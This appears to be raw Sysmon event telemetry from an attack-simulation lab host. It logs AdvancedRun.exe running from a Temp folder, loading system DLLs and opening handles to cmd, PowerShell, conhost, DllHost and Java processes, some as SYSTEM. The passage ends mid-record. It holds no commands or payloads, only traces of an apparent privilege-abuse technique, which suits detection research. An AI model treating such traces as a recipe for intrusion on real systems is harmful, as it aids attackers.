734700x80000000000000004078564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004078561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 
20:16:35.056{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.054{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.054{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.053{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.053{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.051{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI